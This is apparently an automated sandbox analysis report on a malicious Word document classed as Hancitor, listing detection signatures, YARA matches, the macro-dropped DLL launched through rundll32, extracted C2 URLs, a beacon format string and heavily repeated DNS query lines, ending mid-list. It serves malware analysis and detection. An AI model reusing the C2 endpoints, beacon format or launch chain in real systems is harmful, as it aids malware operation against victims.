Windows Analysis Report
0524_4109399728218.doc

Overview

General Information

Sample Name: 0524_4109399728218.doc
Analysis ID: 854354
MD5: 14f4c470c207e22c3b0a4efa7b4200e8
SHA1: 21180195396580a9ade32b589490cf3bc94d3b5b
SHA256: 0b22278ddb598d63f07eb983bcf307e0852cd3005c5bc15d4a4f26455562c8ec

Detection

CryptOne, Hancitor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Yara detected CryptOne packer
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Hancitor
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Document contains OLE streams with names of living off the land binaries
Machine Learning detection for sample
May check the online IP address of the machine
Document exploit detected (process start blacklist hit)
Office process drops PE file
Contains functionality to modify clipboard data
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded macro with GUI obfuscation
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Document misses a certain OLE stream usually present in this Microsoft Office document type
Document contains an ObjectPool stream indicating possible embedded files or OLE objects
Drops files with a non-matching file extension (content does not match file extension)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Yara detected Keylogger Generic
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Found potential string decryption / allocating functions
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Extensive use of GetProcAddress (often used to hide API calls)
Potential key logger detected (key state polling based)
Document contains embedded VBA macros
Contains functionality to detect sandboxes (mouse cursor move detection)
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w10x64_ra
  • WINWORD.EXE (PID: 6280 cmdline: C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\0524_4109399728218.doc" /o " MD5: D244700A767CE9846760CA8AA9574EDE)
    • splwow64.exe (PID: 6460 cmdline: C:\Windows\splwow64.exe 12288 MD5: 7FE20527607797A8DADE19838B8B1573)
    • rundll32.exe (PID: 6600 cmdline: rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX MD5: F68AF942FD7CCC0E7BAB1A2335D2AD26)
      • rundll32.exe (PID: 6624 cmdline: rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX MD5: D0432468FA4B7F66166C430E1334DBDA)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Hancitor | Hancitor (aka Chanitor) emerged in 2013 which spread via social engineering techniques mainly through phishing mails embedded with malicious link and weaponized Microsoft office document contains malicious macro in it. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor
{"Campaign Id": "2405_pin43", "C2 list": ["http://thowerteigime.com/8/forum.php", "http://euvereginumet.ru/8/forum.php", "http://rhopulforopme.ru/8/forum.php"]}
Source | Rule | Description | Author | Strings
0524_4109399728218.doc | INDICATOR_OLE_ObjectPool_Embedded_Files | Detects OLE documents with ObjectPool OLE storage and embed suspicous excutable files | ditekSHen
  • 0x8c380:$s1: ObjectPool
  • 0x8de02:$s2: Ole10Native
  • 0x8c200:$s3: Root Entry
  • 0x8c380:$h1: 4F 00 62 00 6A 00 65 00 63 00 74 00 50 00 6F 00 6F 00 6C 00
  • 0x8de02:$h2: 4F 00 6C 00 65 00 31 00 30 00 4E 00 61 00 74 00 69 00 76 00 65 00
  • 0x8c200:$h3: 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 00
  • 0x8c44d:$olepkg: 00 00 00 0C 00 03 00 00 00 00 00 C0 00 00 00 00 00 00 46
  • 0x14260e:$fa_exe: .exe
  • 0x941a8:$fa_dll: .dll
  • 0x9bce8:$fa_dll: .dll
  • 0x9ce14:$fa_dll: .dll
  • 0xb3d7e:$fa_dll: .DLL
  • 0xbd8c8:$fa_dll: .dll
  • 0xbedd4:$fa_dll: .dll
  • 0xbf65b:$fa_dll: .dll
  • 0xc56d2:$fa_dll: .DLL
  • 0xc7ac4:$fa_dll: .dll
  • 0xc883d:$fa_dll: .dll
  • 0xdc924:$fa_dll: .dll
  • 0xde736:$fa_dll: .dll
  • 0xe0390:$fa_dll: .dll
Source | Rule | Description | Author | Strings
00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Crypt | Yara detected CryptOne packer | Joe Security
00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security
00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Hancitor_6738d84a | unknown | unknown
  • 0x336c:$a1: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d
  • 0x33ac:$a1: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d
  • 0x3438:$b1: Rundll32.exe %s, start
  • 0x3560:$b2: MASSLoader.dll
00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security
00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Hancitor_6738d84a | unknown | unknown
  • 0x41f8:$a1: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d
  • 0x4238:$a1: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d
  • 0x42c4:$b1: Rundll32.exe %s, start
  • 0x43ec:$b2: MASSLoader.dll

Source | Rule | Description | Author | Strings
5.2.rundll32.exe.28e0000.2.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security
5.2.rundll32.exe.42d0000.3.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security
5.2.rundll32.exe.28e0000.2.unpack | Windows_Trojan_Hancitor_6738d84a | unknown | unknown
  • 0x25f8:$a1: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d
  • 0x2638:$a1: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d
  • 0x26c4:$b1: Rundll32.exe %s, start
  • 0x27ec:$b2: MASSLoader.dll
5.2.rundll32.exe.28d0174.1.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security
5.2.rundll32.exe.28e0000.2.unpack | Hancitor | Hancitor Payload | kevoreilly
  • 0x56f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D 08 03 4D FC 88 01 EB C7

No Sigma rule has matched

Timestamp: 04/26/23-12:39:11.196625
Source IP: 1.1.1.1
Destination IP: 192.168.2.2
SID: 2018316
Source Port: 53
Destination Port: 57536
Protocol: UDP
Classtype: A Network Trojan was detected

AV Detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp, Avira: detection malicious, Label: HEUR/AGEN.1328612
Source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: Hancitor {"Campaign Id": "2405_pin43", "C2 list": ["http://thowerteigime.com/8/forum.php", "http://euvereginumet.ru/8/forum.php", "http://rhopulforopme.ru/8/forum.php"]}
Source: 0524_4109399728218.doc, Virustotal: Detection: 65%
Source: 0524_4109399728218.doc, ReversingLabs: Detection: 65%
Source: 0524_4109399728218.doc, Avira: detected
Source: thowerteigime.com, Virustotal: Detection: 15%
Source: euvereginumet.ru, Virustotal: Detection: 10%
Source: rhopulforopme.ru, Virustotal: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\{9C081570-F32B-46C7-9B47-B1E0B2DF993E}\jax.k, ReversingLabs: Detection: 76%
Source: c:\users\user\appdata\roaming\microsoft\word\startup\ket.t (copy), ReversingLabs: Detection: 76%
Source: 0524_4109399728218.doc, Joe Sandbox ML: detected
Source: 5.2.rundll32.exe.42d0000.3.unpack, Avira: Label: TR/Hijacker.Gen
Source: 5.2.rundll32.exe.28d0174.1.unpack, Avira: Label: TR/Kazy.4159236

Location Tracking

Source: Yara match, File source: 5.2.rundll32.exe.28e0000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.42d0000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.28d0174.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.28e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.42d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.28d0174.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 6624, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_042D2CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_042D2CD0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_042D2D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_042D2D17
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_042D2D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_042D2D78
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_042D2D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_042D2D55
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_042D2D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_042D2D98
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_027D8948 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,5_2_027D8948
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_027D55A4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,5_2_027D55A4

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, File created: jax.k.1.dr
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, Process created: C:\Windows\System32\rundll32.exe
Source: global traffic, TCP traffic: 192.168.2.2:49759 -> 64.185.227.155:80
Source: global traffic, TCP traffic: 64.185.227.155:80 -> 192.168.2.2:49759
Source: global traffic, DNS query: name: api.ipify.org
Source: global traffic, DNS query: name: thowerteigime.com
Source: global traffic, DNS query: name: euvereginumet.ru
Source: global traffic, DNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global traffic TCP traffic: 192.168.2.2:49759 -> 64.185.227.155:80

              Networking

              Source: C:\Windows\SysWOW64\rundll32.exe Domain query: thowerteigime.com
              Source: C:\Windows\SysWOW64\rundll32.exe Domain query: euvereginumet.ru
              Source: C:\Windows\SysWOW64\rundll32.exe Domain query: rhopulforopme.ru
              Source: C:\Windows\SysWOW64\rundll32.exe Domain query: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 64.185.227.155 80
              Source: Traffic Snort IDS: 2018316 ET TROJAN Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses 1.1.1.1:53 -> 192.168.2.2:57536
              Source: C:\Windows\SysWOW64\rundll32.exe DNS query: name: api.ipify.org
              Source: Malware configuration extractor URLs: http://thowerteigime.com/8/forum.php
              Source: Malware configuration extractor URLs: http://euvereginumet.ru/8/forum.php
              Source: Malware configuration extractor URLs: http://rhopulforopme.ru/8/forum.php
              Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: api.ipify.org Cache-Control: no-cache
              Source: Joe Sandbox View IP Address: 64.185.227.155
              Source: rundll32.exe, rundll32.exe, 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.org
              Source: rundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.org/D
              Source: rundll32.exe, 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
              Source: rundll32.exe, 00000005.00000003.1997207362.000000000295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpCon
              Source: rundll32.exe, 00000005.00000003.2252179688.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2203720473.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2295617717.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2669273371.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2299435821.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2293982468.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2417726399.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2144410797.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2423532675.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2242990898.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2216357507.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2149855753.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2254606007.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2644212048.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2197094603.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2154355980.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2210739764.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2278515571.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 
00000005.00000003.1767304866.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2305462785.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpe
              Source: rundll32.exe, 00000005.00000003.2210739764.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2212107841.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpe.ru/8/forum.php
              Source: rundll32.exe, 00000005.00000003.1997207362.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2295617717.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2299435821.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2293982468.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2504428556.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1784421545.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1878016412.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpet.ru/8/forum.php
              Source: rundll32.exe, 00000005.00000002.2669273371.0000000002925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpginumet.ru5
              Source: rundll32.exe, 00000005.00000003.2259063062.0000000002954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpj
              Source: rundll32.exe, 00000005.00000003.2154355980.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2644212048.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2299435821.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166981551.0000000002954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpl
              Source: rundll32.exe, 00000005.00000003.1952161754.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpme.ru/8/forum.php
              Source: rundll32.exe, 00000005.00000003.1777395785.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpme.ru/8/forum.phpe
              Source: rundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2322656876.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2252179688.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1942123360.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2669273371.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1952161754.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2299435821.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2237144969.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2293982468.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2192261942.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2417726399.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2238857143.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2118717721.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2144410797.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2242990898.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2216357507.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 